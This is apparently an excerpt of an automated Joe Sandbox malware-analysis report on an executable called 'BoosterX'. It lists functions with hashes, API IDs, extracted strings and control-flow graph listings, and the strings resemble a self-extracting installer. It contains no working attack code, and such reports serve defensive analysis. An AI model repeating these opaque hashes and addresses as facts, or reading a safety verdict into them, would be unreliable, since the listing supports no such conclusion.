                                                    • Instruction ID: 06543067478c07d0d9f948c18f3eaddec3237e0c219fcf2e3b63fe5b2e0a514e
                                                    • Opcode Fuzzy Hash: b604c9a845cf12cf003dbce948390fa4b7da71dc3bf0753df9959c8a9c66759f
                                                    • Instruction Fuzzy Hash: 02E2CC2AB08683A6EB28DF65D4602FD77A1BB45789F400136DA9EC77A6DF3CE155C300

                                                    Control-flow Graph (rendered graph omitted; node list not reproducible as text)
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                    • String ID:
                                                    • API String ID: 474548282-0
                                                    • Opcode ID: df5fb015d0809fc36b7a8a0f7a6842cf0e825b584bc584af1691e1d1962cd2a0
                                                    • Instruction ID: dab39743beb0bc49e79a0ad50ed93e6e3bca6cbdb55518426c9ba6f0392a51dd
                                                    • Opcode Fuzzy Hash: df5fb015d0809fc36b7a8a0f7a6842cf0e825b584bc584af1691e1d1962cd2a0
                                                    • Instruction Fuzzy Hash: 9B619062A08A43A6EB109F28E84527D6361FB967A5F505331EAEDC3BD9DF3CD584C700

                                                    Control-flow Graph (rendered graph omitted; node list not reproducible as text)
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CMT
                                                    • API String ID: 0-2756464174
                                                    • Opcode ID: 3b349836db39cc0ffb878f66b914c5340b19c329b1b65cc42fc356a8d09ab802
                                                    • Instruction ID: e092937b5e4423125992e8b22e1e05d51746d14bc48c1114d3365994cb2d316d
                                                    • Opcode Fuzzy Hash: 3b349836db39cc0ffb878f66b914c5340b19c329b1b65cc42fc356a8d09ab802
                                                    • Instruction Fuzzy Hash: B342A82AB08683AAEB189F75C1502FD77A5AB55749F400236DB9ED37A6DF38E518C300

                                                    Control-flow Graph (rendered graph omitted; node list not reproducible as text)
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                    • API String ID: 1496594111-2013832382
                                                    • Opcode ID: 2687c1cd523b65dc0cdc345ea7a2c039bde8b95e1f16db974beb6a896d2519a5
                                                    • Instruction ID: 6a176535134ec838a50cb710305ad0974224b7ba00534d446727715b9270745e
                                                    • Opcode Fuzzy Hash: 2687c1cd523b65dc0cdc345ea7a2c039bde8b95e1f16db974beb6a896d2519a5
                                                    • Instruction Fuzzy Hash: F632F835A09B83A9EB219F64E8411E933A4FF45359F500236DA8DC67A9EF3CE659C340
                                                    APIs
                                                      • Part of subcall function 00007FF6C0368E18: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C0368F4D
                                                    • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6C0369F35
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C036A3EF
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C036A3F5
                                                      • Part of subcall function 00007FF6C0370B3C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6C0370AC4), ref: 00007FF6C0370B69
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                    • API String ID: 3629253777-3268106645
                                                    • Opcode ID: 9426cd898b9218b2b25dcf31cc706f89de0b1c10041d7f527c3fd8ab1e9ee5ae
                                                    • Instruction ID: 2ba037f394a27334eec50bee73582e2b6d6417c7f21937a0c58efbb0fcf1a3a8
                                                    • Opcode Fuzzy Hash: 9426cd898b9218b2b25dcf31cc706f89de0b1c10041d7f527c3fd8ab1e9ee5ae
                                                    • Instruction Fuzzy Hash: 1962BC22A19B83A5EB10DF28C4482BD23A5FB45789F805132DA9EC77D5EF3DE945C740

                                                    Control-flow Graph

                                                    control_flow_graph 1911 7ff6c0381880-7ff6c0381909 call 7ff6c03814d8 1914 7ff6c038190b-7ff6c038192f call 7ff6c03817e8 RaiseException 1911->1914 1915 7ff6c0381934-7ff6c0381951 1911->1915 1921 7ff6c0381b38-7ff6c0381b55 1914->1921 1917 7ff6c0381966-7ff6c038196a 1915->1917 1918 7ff6c0381953-7ff6c0381964 1915->1918 1920 7ff6c038196d-7ff6c0381979 1917->1920 1918->1920 1922 7ff6c038197b-7ff6c038198d 1920->1922 1923 7ff6c038199a-7ff6c038199d 1920->1923 1931 7ff6c0381b09-7ff6c0381b13 1922->1931 1932 7ff6c0381993 1922->1932 1924 7ff6c0381a44-7ff6c0381a4b 1923->1924 1925 7ff6c03819a3-7ff6c03819a6 1923->1925 1927 7ff6c0381a4d-7ff6c0381a5c 1924->1927 1928 7ff6c0381a5f-7ff6c0381a62 1924->1928 1929 7ff6c03819bd-7ff6c03819d2 LoadLibraryExA 1925->1929 1930 7ff6c03819a8-7ff6c03819bb 1925->1930 1927->1928 1933 7ff6c0381a68-7ff6c0381a6c 1928->1933 1934 7ff6c0381b05 1928->1934 1935 7ff6c0381a29-7ff6c0381a32 1929->1935 1936 7ff6c03819d4-7ff6c03819e7 GetLastError 1929->1936 1930->1929 1930->1935 1943 7ff6c0381b15-7ff6c0381b26 1931->1943 1944 7ff6c0381b30 call 7ff6c03817e8 1931->1944 1932->1923 1941 7ff6c0381a9b-7ff6c0381aae GetProcAddress 1933->1941 1942 7ff6c0381a6e-7ff6c0381a72 1933->1942 1934->1931 1937 7ff6c0381a3d 1935->1937 1938 7ff6c0381a34-7ff6c0381a37 FreeLibrary 1935->1938 1945 7ff6c03819e9-7ff6c03819fc 1936->1945 1946 7ff6c03819fe-7ff6c0381a24 call 7ff6c03817e8 RaiseException 1936->1946 1937->1924 1938->1937 1941->1934 1950 7ff6c0381ab0-7ff6c0381ac3 GetLastError 1941->1950 1942->1941 1947 7ff6c0381a74-7ff6c0381a7f 1942->1947 1943->1944 1953 7ff6c0381b35 1944->1953 1945->1935 1945->1946 1946->1921 1947->1941 1951 7ff6c0381a81-7ff6c0381a88 1947->1951 1955 7ff6c0381ada-7ff6c0381b01 call 7ff6c03817e8 RaiseException call 7ff6c03814d8 1950->1955 1956 7ff6c0381ac5-7ff6c0381ad8 1950->1956 1951->1941 1958 7ff6c0381a8a-7ff6c0381a8f 1951->1958 1953->1921 1955->1934 1956->1934 1956->1955 1958->1941 1961 7ff6c0381a91-7ff6c0381a99 1958->1961 1961->1934 1961->1941
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                    • String ID: H
                                                    • API String ID: 3432403771-2852464175
                                                    • Opcode ID: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
                                                    • Instruction ID: a1468e630065cc1cda865ee037cc4ba97b51f23d1fd821adfe7e9f3a3b5aff46
                                                    • Opcode Fuzzy Hash: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
                                                    • Instruction Fuzzy Hash: C2914A22A15B13AAEB54CF65D8446AC33A9FB08B8AF454636DE8DD7754EF3CE445C300

                                                    Control-flow Graph

                                                    control_flow_graph 1989 7ff6c037f460-7ff6c037f4a3 1990 7ff6c037f4a9-7ff6c037f4e5 call 7ff6c0383c70 1989->1990 1991 7ff6c037f814-7ff6c037f839 call 7ff6c0351fa0 call 7ff6c03822a0 1989->1991 1997 7ff6c037f4ea-7ff6c037f4f1 1990->1997 1998 7ff6c037f4e7 1990->1998 2000 7ff6c037f4f3-7ff6c037f4f7 1997->2000 2001 7ff6c037f502-7ff6c037f506 1997->2001 1998->1997 2002 7ff6c037f4fc-7ff6c037f500 2000->2002 2003 7ff6c037f4f9 2000->2003 2004 7ff6c037f50b-7ff6c037f516 2001->2004 2005 7ff6c037f508 2001->2005 2002->2004 2003->2002 2006 7ff6c037f51c 2004->2006 2007 7ff6c037f5a8 2004->2007 2005->2004 2009 7ff6c037f522-7ff6c037f529 2006->2009 2008 7ff6c037f5ac-7ff6c037f5af 2007->2008 2010 7ff6c037f5b7-7ff6c037f5ba 2008->2010 2011 7ff6c037f5b1-7ff6c037f5b5 2008->2011 2012 7ff6c037f52b 2009->2012 2013 7ff6c037f52e-7ff6c037f533 2009->2013 2016 7ff6c037f5e0-7ff6c037f5f3 call 7ff6c036636c 2010->2016 2017 7ff6c037f5bc-7ff6c037f5c3 2010->2017 2011->2010 2011->2016 2012->2013 2014 7ff6c037f565-7ff6c037f570 2013->2014 2015 7ff6c037f535 2013->2015 2021 7ff6c037f575-7ff6c037f57a 2014->2021 2022 7ff6c037f572 2014->2022 2018 7ff6c037f54a-7ff6c037f550 2015->2018 2032 7ff6c037f618-7ff6c037f66d call 7ff6c03878fc call 7ff6c035129c call 7ff6c0363268 call 7ff6c0351fa0 2016->2032 2033 7ff6c037f5f5-7ff6c037f613 call 7ff6c0371344 2016->2033 2017->2016 2019 7ff6c037f5c5-7ff6c037f5dc 2017->2019 2023 7ff6c037f537-7ff6c037f53e 2018->2023 2024 7ff6c037f552 2018->2024 2019->2016 2026 7ff6c037f83a-7ff6c037f841 2021->2026 2027 7ff6c037f580-7ff6c037f587 2021->2027 2022->2021 2028 7ff6c037f543-7ff6c037f548 2023->2028 2029 7ff6c037f540 2023->2029 2024->2014 2030 7ff6c037f846-7ff6c037f84b 2026->2030 2031 7ff6c037f843 2026->2031 2034 7ff6c037f58c-7ff6c037f592 2027->2034 2035 7ff6c037f589 2027->2035 2028->2018 2037 7ff6c037f554-7ff6c037f55b 2028->2037 2029->2028 2038 7ff6c037f84d-7ff6c037f854 2030->2038 2039 7ff6c037f85e-7ff6c037f866 2030->2039 2031->2030 2056 7ff6c037f6c2-7ff6c037f6cf ShellExecuteExW 2032->2056 2057 7ff6c037f66f-7ff6c037f6bd call 7ff6c03878fc call 7ff6c035129c call 7ff6c0365b20 call 7ff6c0351fa0 2032->2057 2033->2032 2034->2026 2036 7ff6c037f598-7ff6c037f5a2 2034->2036 2035->2034 2036->2007 2036->2009 2042 7ff6c037f55d 2037->2042 2043 7ff6c037f560 2037->2043 2044 7ff6c037f859 2038->2044 2045 7ff6c037f856 2038->2045 2046 7ff6c037f86b-7ff6c037f876 2039->2046 2047 7ff6c037f868 2039->2047 2042->2043 2043->2014 2044->2039 2045->2044 2046->2008 2047->2046 2058 7ff6c037f7c6-7ff6c037f7ce 2056->2058 2059 7ff6c037f6d5-7ff6c037f6df 2056->2059 2057->2056 2064 7ff6c037f802-7ff6c037f80f 2058->2064 2065 7ff6c037f7d0-7ff6c037f7e6 2058->2065 2061 7ff6c037f6e1-7ff6c037f6e4 2059->2061 2062 7ff6c037f6ef-7ff6c037f6f2 2059->2062 2061->2062 2066 7ff6c037f6e6-7ff6c037f6ed 2061->2066 2067 7ff6c037f6f4-7ff6c037f6ff call 7ff6c03be188 2062->2067 2068 7ff6c037f70e-7ff6c037f72d call 7ff6c03be1b8 call 7ff6c037fda4 2062->2068 2064->1991 2070 7ff6c037f7fd call 7ff6c038218c 2065->2070 2071 7ff6c037f7e8-7ff6c037f7fb 2065->2071 2066->2062 2072 7ff6c037f763-7ff6c037f770 CloseHandle 2066->2072 2067->2068 2088 7ff6c037f701-7ff6c037f70c ShowWindow 2067->2088 2068->2072 2097 7ff6c037f72f-7ff6c037f732 2068->2097 2070->2064 2071->2070 2076 7ff6c037f87b-7ff6c037f883 call 7ff6c0387884 2071->2076 2078 7ff6c037f785-7ff6c037f78c 2072->2078 2079 7ff6c037f772-7ff6c037f783 call 7ff6c0371344 2072->2079 2086 7ff6c037f7ae-7ff6c037f7b0 2078->2086 2087 7ff6c037f78e-7ff6c037f791 2078->2087 2079->2078 2079->2086 2086->2058 2093 7ff6c037f7b2-7ff6c037f7b5 2086->2093 2087->2086 2092 7ff6c037f793-7ff6c037f7a8 2087->2092 2088->2068 2092->2086 2093->2058 2096 7ff6c037f7b7-7ff6c037f7c5 ShowWindow 2093->2096 2096->2058 2097->2072 2099 7ff6c037f734-7ff6c037f745 GetExitCodeProcess 2097->2099 2099->2072 2100 7ff6c037f747-7ff6c037f75c 2099->2100 2100->2072
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                    • String ID: .exe$.inf$Install$p
                                                    • API String ID: 1054546013-3607691742
                                                    • Opcode ID: 98f894956b22e91467c786fab3bb2a7ad0780f0785066d173f3d7dba5a37177a
                                                    • Instruction ID: 40b19459d15f230cebbf0ed87b7aabdb6576dc03983c57adec1e65d372e347f9
                                                    • Opcode Fuzzy Hash: 98f894956b22e91467c786fab3bb2a7ad0780f0785066d173f3d7dba5a37177a
                                                    • Instruction Fuzzy Hash: D5C17B62F08A53A9FB14CF29DA4427923A1BF85B86F045535CA8DC7BA5DF3CE551C300

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                    • String ID:
                                                    • API String ID: 3569833718-0
                                                    • Opcode ID: 7d379054cb94ea220feff0600702c1a3525b366c45d8dc990373b330b6eb2c2b
                                                    • Instruction ID: 418c493e6f742c122c425f19ee54058554f9a3393abc939233c4776504fa3379
                                                    • Opcode Fuzzy Hash: 7d379054cb94ea220feff0600702c1a3525b366c45d8dc990373b330b6eb2c2b
                                                    • Instruction Fuzzy Hash: BD41DE25B14A43AAF7008F69E814BAA23A0EB89B9EF441135DD8EC7B95CF3DE4458740

                                                    Control-flow Graph

                                                    control_flow_graph 2668 7ff6c036b970-7ff6c036b9a2 2669 7ff6c036b9a4-7ff6c036b9aa 2668->2669 2670 7ff6c036ba0f 2668->2670 2669->2670 2671 7ff6c036b9ac-7ff6c036b9c2 call 7ff6c036dd04 2669->2671 2672 7ff6c036ba16-7ff6c036ba23 2670->2672 2680 7ff6c036b9f8 2671->2680 2681 7ff6c036b9c4-7ff6c036b9f6 GetProcAddressForCaller GetProcAddress 2671->2681 2674 7ff6c036ba69-7ff6c036ba6c 2672->2674 2675 7ff6c036ba25-7ff6c036ba28 2672->2675 2677 7ff6c036ba86-7ff6c036ba8f GetCurrentProcessId 2674->2677 2678 7ff6c036ba6e-7ff6c036ba7b 2674->2678 2675->2677 2679 7ff6c036ba2a-7ff6c036ba3a 2675->2679 2682 7ff6c036baa1-7ff6c036babb 2677->2682 2683 7ff6c036ba91-7ff6c036ba9f 2677->2683 2678->2682 2687 7ff6c036ba7d-7ff6c036ba84 2678->2687 2679->2682 2688 7ff6c036ba3c 2679->2688 2684 7ff6c036b9ff-7ff6c036ba0d 2680->2684 2681->2684 2683->2682 2683->2683 2684->2672 2689 7ff6c036ba43-7ff6c036ba67 call 7ff6c035b67c call 7ff6c035ba60 call 7ff6c035b674 2687->2689 2688->2689 2689->2682
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                    • API String ID: 1389829785-2207617598
                                                    • Opcode ID: 76993cb25b15c21bbb9ba85500eed42f79ef62b9df03f1df33b6944fdfd5394b
                                                    • Instruction ID: d6d17fdaf12f484f752ad1c12fa8618abb0646ae17a6ffb8921b9c45ae3373b4
                                                    • Opcode Fuzzy Hash: 76993cb25b15c21bbb9ba85500eed42f79ef62b9df03f1df33b6944fdfd5394b
                                                    • Instruction Fuzzy Hash: EA314824A09A43B1FA14CF56E85417927A0FF49B96F051136CDCEC37A0EF7CE6858B44
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 310a567e1b0cdd217b1bc7ae60d0b9563787d76a53dbdd708a46cc85320c2f81
                                                    • Instruction ID: d120765f6cc22e434e31143b87ead6786598abd429e62df59c8607c2f6a327fc
                                                    • Opcode Fuzzy Hash: 310a567e1b0cdd217b1bc7ae60d0b9563787d76a53dbdd708a46cc85320c2f81
                                                    • Instruction Fuzzy Hash: E0129066B08B43A9EA10DF65D4442AD3372AB457A9F500232DE9CD7BEADF3CE585C340

                                                    Control-flow Graph

                                                    control_flow_graph 3549 7ff6c0362480-7ff6c03624bb 3550 7ff6c03624bd-7ff6c03624c4 3549->3550 3551 7ff6c03624c6 3549->3551 3550->3551 3552 7ff6c03624c9-7ff6c0362538 3550->3552 3551->3552 3553 7ff6c036253a 3552->3553 3554 7ff6c036253d-7ff6c0362568 CreateFileW 3552->3554 3553->3554 3555 7ff6c0362648-7ff6c036264d 3554->3555 3556 7ff6c036256e-7ff6c036259e GetLastError call 7ff6c03669cc 3554->3556 3557 7ff6c0362653-7ff6c0362657 3555->3557 3565 7ff6c03625ec 3556->3565 3566 7ff6c03625a0-7ff6c03625ea CreateFileW GetLastError 3556->3566 3559 7ff6c0362659-7ff6c036265c 3557->3559 3560 7ff6c0362665-7ff6c0362669 3557->3560 3559->3560 3562 7ff6c036265e 3559->3562 3563 7ff6c036266b-7ff6c036266f 3560->3563 3564 7ff6c036268f-7ff6c03626a3 3560->3564 3562->3560 3563->3564 3567 7ff6c0362671-7ff6c0362689 SetFileTime 3563->3567 3568 7ff6c03626cc-7ff6c03626f5 call 7ff6c03822a0 3564->3568 3569 7ff6c03626a5-7ff6c03626b0 3564->3569 3570 7ff6c03625f2-7ff6c03625fa 3565->3570 3566->3570 3567->3564 3571 7ff6c03626c8 3569->3571 3572 7ff6c03626b2-7ff6c03626ba 3569->3572 3573 7ff6c03625fc-7ff6c0362613 3570->3573 3574 7ff6c0362633-7ff6c0362646 3570->3574 3571->3568 3576 7ff6c03626bc 3572->3576 3577 7ff6c03626bf-7ff6c03626c3 call 7ff6c03520b0 3572->3577 3578 7ff6c0362615-7ff6c0362628 3573->3578 3579 7ff6c036262e call 7ff6c038218c 3573->3579 3574->3557 3576->3577 3577->3571 3578->3579 3582 7ff6c03626f6-7ff6c03626fb call 7ff6c0387884 3578->3582 3579->3574
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3536497005-0
                                                    • Opcode ID: 0eb7fe8ef4f4561f9daaefcb571c72f3411a72b64bfc3ca10e0d2da5fc9e6a2c
                                                    • Instruction ID: 2f3c7e4383bf0eaef934d3febce9c2f04de1211899d3aeebacfa6d6bb32176c7
                                                    • Opcode Fuzzy Hash: 0eb7fe8ef4f4561f9daaefcb571c72f3411a72b64bfc3ca10e0d2da5fc9e6a2c
                                                    • Instruction Fuzzy Hash: 3C61D276A08A8296E7208F29E4003AE67A1B7857A9F101324DFEDC3BD4DF7DD0548744

                                                    Control-flow Graph

